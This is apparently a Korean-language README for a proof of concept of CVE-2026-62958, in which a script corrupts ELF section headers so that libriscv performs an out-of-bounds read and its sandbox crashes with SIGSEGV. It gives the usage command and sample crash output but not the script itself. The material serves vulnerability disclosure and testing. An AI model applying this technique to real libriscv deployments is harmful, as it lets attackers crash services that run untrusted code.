
# CVE-2026-62958 개념 증명: Libriscv의 경계를 벗어난 읽기를 유발하는 손상된 ELF 제작 Libriscv에서 경계를 벗어난 읽기를 트리거하고 SIGSEGV로 샌드박스를 충돌시키는 손상된 ELF를 제작하는 개념 증명입니다.
Libriscv의 취약점으로 인해 공격자가 Out of Bounds Read를 사용하여 샌드박스를 충돌시킬 수 있습니다.
python3 poc.py samplefile poisoned_file
결과:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)